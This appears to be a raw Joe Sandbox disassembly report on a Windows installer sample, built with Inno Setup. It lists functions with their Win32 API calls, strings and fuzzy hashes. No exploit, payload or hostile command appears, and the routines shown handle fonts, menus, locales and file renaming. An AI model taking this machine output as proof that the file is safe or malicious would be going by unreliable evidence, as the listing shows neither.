Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 4d906fac6dccdf438760750c8da522a8f943409b0e1b4cd23829c8425d47f062
Instruction ID: 7097c2831d41c9cd2ca76b8e30f6fd32102657c6dd1fb14c708e758a2e1a6bb0
Opcode Fuzzy Hash: 4d906fac6dccdf438760750c8da522a8f943409b0e1b4cd23829c8425d47f062
Instruction Fuzzy Hash: 6421C770741204BBD710EA669C42FAE679DDB54704F50843BBA04FB3C2D67CAE05466D

Function 00462ED8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE

GetVersion.KERNEL32 ref: 00462F08
SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462F46
SHGetFileInfo.SHELL32(00462FE4,00000000,?,00000160,00004011), ref: 00462F63
LoadCursorA.USER32(00000000,00007F02), ref: 00462F81
SetCursor.USER32(00000000,00000000,00007F02,00462FE4,00000000,?,00000160,00004011), ref: 00462F87
SetCursor.USER32(?,00462FC7,00007F02,00462FE4,00000000,?,00000160,00004011), ref: 00462FBA

Strings

Explorer, xrefs: 00462F22

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
Opcode ID: 96f263f28a0c5ccb9cf997cde3498094f1a70322a781246ee7820a3eb8b88b0c
Instruction ID: e6c52dcece90e3493be9f15e0e64570b8c3e052e326357339ba6e8db1b4e70e7
Opcode Fuzzy Hash: 96f263f28a0c5ccb9cf997cde3498094f1a70322a781246ee7820a3eb8b88b0c
Instruction Fuzzy Hash: 80210A707447047AE714BB758D87F9A76989B04708F4004BFB609EE1C3DAFC9805966D

Function 004787AC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787C5
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004787CB
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787DE
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4), ref: 00478808
CloseHandle.KERNEL32(00000000,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 00478826

Strings

GetFinalPathNameByHandleA, xrefs: 004787BB
kernel32.dll, xrefs: 004787C0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: c594ba596ff371defbe1f19e99b7548ca8d88db220ed669b2209c8c709b6289d
Instruction ID: b4b4eb6e882b21a3e38edc8c56477b2b3cf7b2a6488eba7606f3a3958a626299
Opcode Fuzzy Hash: c594ba596ff371defbe1f19e99b7548ca8d88db220ed669b2209c8c709b6289d
Instruction Fuzzy Hash: A101D6717C470436E52035AB4C8AFBB654C8B50769F65813F7A5CEA2C2DEAC8D0601AF

Function 00459EB4 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045A036,?,00000000,00000000,00000000,?,00000006,?,00000000,00497F35,?,00000000,00497FD8), ref: 00459F7A

Part of subcall function 00454468: FindClose.KERNEL32(000000FF,0045455E), ref: 0045454D

Strings

Stripped read-only attribute., xrefs: 00459F3C
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459F54
Failed to strip read-only attribute., xrefs: 00459F48
Failed to delete directory (%d). Will retry later., xrefs: 00459F93
Deleting directory: %s, xrefs: 00459F03
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459FEF
Failed to delete directory (%d)., xrefs: 0045A010

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 108d6f8d37026f2bdf90fc188fb77551ed7727444c0280258668295353b09f4f
Instruction ID: f7c933924608f42955d773fda0cc7ecec7f056cd1af039b488d7310b1683b7b3
Opcode Fuzzy Hash: 108d6f8d37026f2bdf90fc188fb77551ed7727444c0280258668295353b09f4f
Instruction Fuzzy Hash: 2741AF30A142459ACB14DF6988013AEBAA59F4970AF50867BAC05D73C3CB7D8D1DC75E

Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00422EB4
GetCapture.USER32 ref: 00422EC3
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
ReleaseCapture.USER32 ref: 00422ECE
GetActiveWindow.USER32 ref: 00422EDD
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
GetActiveWindow.USER32 ref: 00422FCF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 68a87140416b020399d93bb5315a0a21c376da3895e44649e19dd4425ce1cb21
Instruction ID: 5ea5fd569023dc8c87c0f060f2033c8effa86d07781bc97308b393d06b21a190
Opcode Fuzzy Hash: 68a87140416b020399d93bb5315a0a21c376da3895e44649e19dd4425ce1cb21
Instruction Fuzzy Hash: 42414F70B00254AFDB10EB69DA82B9E77F1EF48304F5540BAF500AB292D7B89E40DB58

Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0042949A
GetTextMetricsA.GDI32(00000000), ref: 004294A3

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 004294B2
GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
SelectObject.GDI32(00000000,00000000), ref: 004294C6
ReleaseDC.USER32(00000000,00000000), ref: 004294CE
GetSystemMetrics.USER32(00000006), ref: 004294F3
GetSystemMetrics.USER32(00000006), ref: 0042950D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
String ID:
API String ID: 1583807278-0
Opcode ID: f653b88d646d5855613b637c91f02c053f26aae7c72922398ebfcd233ccf026a
Instruction ID: 697d7c7282338d87a55ab62dd7e79ac53eeb01c5e9ca74f61c727bf968a75029
Opcode Fuzzy Hash: f653b88d646d5855613b637c91f02c053f26aae7c72922398ebfcd233ccf026a
Instruction Fuzzy Hash: 4B01E1517087113AF311767A8CC2F6F65C8CB48348F44043AFA46963D3D96C9C81872A

Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0041DE37
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE41
ReleaseDC.USER32(00000000,00000000), ref: 0041DE4E
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
GetStockObject.GDI32(00000007), ref: 0041DE6B
GetStockObject.GDI32(00000005), ref: 0041DE77
GetStockObject.GDI32(0000000D), ref: 0041DE83
LoadIconA.USER32(00000000,00007F00), ref: 0041DE94

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ObjectStock$CapsDeviceIconLoadRelease
String ID:
API String ID: 225703358-0
Opcode ID: acbeab26448ca7b360d039afddd60c8d357067f60e495a2bdddab1aa7473d77b
Instruction ID: 417a648a5fb8aa5baf3b27a45d37177240889d53830a96f1de9ccb55acdbe8d0
Opcode Fuzzy Hash: acbeab26448ca7b360d039afddd60c8d357067f60e495a2bdddab1aa7473d77b
Instruction Fuzzy Hash: D0113D706443015AE340FFA65992BAA3690EB24709F00913FF609AF3D1DA7E1C849B6E

Function 004632E8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 004633EC
SetCursor.USER32(00000000,00000000,00007F02,00000000,00463481), ref: 004633F2
SetCursor.USER32(?,00463469,00007F02,00000000,00463481), ref: 0046345C

Strings

, xrefs: 00463682
Internal error: Item already expanding, xrefs: 00463389
, xrefs: 00463667

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$Load
String ID: $ $Internal error: Item already expanding
API String ID: 1675784387-1948079669
Opcode ID: f6d1be44cf2e44268d7afd95b077db9a3be558b3ec252d02f0fd4fc7ed4407db
Instruction ID: 22b4a0b3887aba48b6836ac3fd128682d97f720243347cd6184d65e00a263647
Opcode Fuzzy Hash: f6d1be44cf2e44268d7afd95b077db9a3be558b3ec252d02f0fd4fc7ed4407db
Instruction Fuzzy Hash: A1B1A230A00284EFDB21DF29C545B9ABBF0AF04305F1585AEE8459B792D778EE44CB5A

Function 00453DA4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E8B

Strings

MoveFileEx, xrefs: 0045409B
[rename], xrefs: 00453EEE, 00453F2A
.tmp, xrefs: 00453E47
WININIT.INI, xrefs: 00453E39
NUL, xrefs: 00453F4D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 45615c73439ce270b6d05ccbf14361c73deff9410c1a8f3f205c5696ea4c069e
Instruction ID: b3c584f0f22674ad0fcc633aedcec79f77295145a47899f9a0f541d7d967d7d4
Opcode Fuzzy Hash: 45615c73439ce270b6d05ccbf14361c73deff9410c1a8f3f205c5696ea4c069e
Instruction Fuzzy Hash: 9191F534E001099BDF11EFA5D881BDEB7F5EF4834AF508466E900B7292D7789E49CA58

Function 0047708C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004770E5
SetWindowLongW.USER32(00000000,000000FC,00477040), ref: 0047710C
GetACP.KERNEL32(00000000,00477324,?,00000000,0047734E), ref: 00477149
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0047718F

Strings

Inno Setup: Language, xrefs: 00477217
COMBOBOX, xrefs: 004770DE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ClassInfoLongMessageSendWindow
String ID: COMBOBOX$Inno Setup: Language
API String ID: 3391662889-4234151509
Opcode ID: 521d6e489fa1ae24faf8f78c129860c497e4f80b4a302989467673be046d20e0
Instruction ID: 5e09237f06f7ca82dbad2e96fb5083c0fe5e5e2331f930e3c55d8b81a1e05678
Opcode Fuzzy Hash: 521d6e489fa1ae24faf8f78c129860c497e4f80b4a302989467673be046d20e0
Instruction Fuzzy Hash: 67814F30A042059FCB10DF69C985A9AB7F1FB49304F9481BAEC08EB362D734AD41CB99

Function 00408730 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00408978,?,?,?,?,00000000,00000000,00000000,?,0040997F,00000000,00409992), ref: 0040874A

Part of subcall function 00408578: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596

Part of subcall function 004085C4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087C6,?,?,?,00000000,00408978), ref: 004085D7

Strings

mmmm d, yyyy, xrefs: 0040883B
:mm:ss, xrefs: 00408946
AMPM, xrefs: 00408915
m/d/yy, xrefs: 00408819
:mm, xrefs: 0040892C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 70ae38f132fc3d3f9053d40cb900b3f5106e9b3c11c1bc8091f0af349ffabeb6
Instruction ID: 31fd29742738ad3ef4a1c8f63862b88eefe7a444323e1968e1f56601496a4ee9
Opcode Fuzzy Hash: 70ae38f132fc3d3f9053d40cb900b3f5106e9b3c11c1bc8091f0af349ffabeb6
Instruction Fuzzy Hash: 55512D74B001486BDB01FBA69D91AAE77A9DB94308F50D47FA181BB3C6CE3CDA05871D

Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A

Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6

Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD

Strings

?, xrefs: 004117B6
,, xrefs: 004117AF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 44383e044abff6cbf278423e894284f1520358ef4015b87050d63fd1739e3a25
Instruction ID: c427c9b06a4b8e224850f8fd68708263cabc4ba561a0b31d0e571b4226371ffb
Opcode Fuzzy Hash: 44383e044abff6cbf278423e894284f1520358ef4015b87050d63fd1739e3a25
Instruction Fuzzy Hash: 0C511774A00144ABDB10EF7ADC816EA7BF9AF08304B1185BBF914E73A6D738D941CB58

Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
DeleteObject.GDI32(?), ref: 0041BFAF
DeleteObject.GDI32(?), ref: 0041BFB8
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: 5a427f00feddb577fff5167fa7821d20935eac0201827996bfcfefe2a8efdbf4
Instruction ID: 04b97f25464b58ff436fe1885c4dd039914ee627ffefe5dec802ec1f9d3f819a
Opcode Fuzzy Hash: 5a427f00feddb577fff5167fa7821d20935eac0201827996bfcfefe2a8efdbf4
Instruction Fuzzy Hash: 8A510571A006199FCB14DFA9C8819EEB7F9EF48314B11442AF914E7391D738AD81CB64

Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF2D
SelectPalette.GDI32(?,?,00000001), ref: 0041CF93
RealizePalette.GDI32(?), ref: 0041CFA2
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
SelectPalette.GDI32(?,?,00000001), ref: 0041D06F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
String ID:
API String ID: 2222416421-0
Opcode ID: d578c5c43a151ca21ad873cc4bbf55809b48f101e43ab62b7175feda3131b2cf
Instruction ID: 901e13b734fcfe26ab98e85b677eebf668a0bb257bdc2dc03c804f52c9ec24c8
Opcode Fuzzy Hash: d578c5c43a151ca21ad873cc4bbf55809b48f101e43ab62b7175feda3131b2cf
Instruction Fuzzy Hash: 47514FB0600204AFDB14DFA9C995F9BBBF9EF08304F108599B549DB292C778ED81CB58

Function 00457384 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,?,?), ref: 004573D6

Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045743D
TranslateMessage.USER32(?), ref: 0045745B
DispatchMessageA.USER32(?), ref: 00457464

Strings

[Paused] , xrefs: 0045740C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
String ID: [Paused]
API String ID: 1007367021-4230553315
Opcode ID: 6b168901e7e1781911bc7d22981d81ae3d793b775a360e859fc7bc33357b6a45
Instruction ID: dae39b44a8721021bfcf47da434b07c1a86f758a792d2d621748dfb7f1b1fb5a
Opcode Fuzzy Hash: 6b168901e7e1781911bc7d22981d81ae3d793b775a360e859fc7bc33357b6a45
Instruction Fuzzy Hash: 47319531908248AEDB11DBB5EC41BDE7FB8DB4E314F558077E800E7292D67C9909CB69

Function 0046B520 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON

Download Yara Rule

APIs

GetCursor.USER32(00000000,0046B65F), ref: 0046B5DC
LoadCursorA.USER32(00000000,00007F02), ref: 0046B5EA
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B5F0
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B5FA
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B600

Strings

CheckPassword, xrefs: 0046B584

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 58e796373b9fdc746396fa9d1da2347ca5f5e20d566bce270774f79728b0c312
Instruction ID: 9215a56909f4d399359b4036adebcff7cd559b99f6583fb3c160e276e3804376
Opcode Fuzzy Hash: 58e796373b9fdc746396fa9d1da2347ca5f5e20d566bce270774f79728b0c312
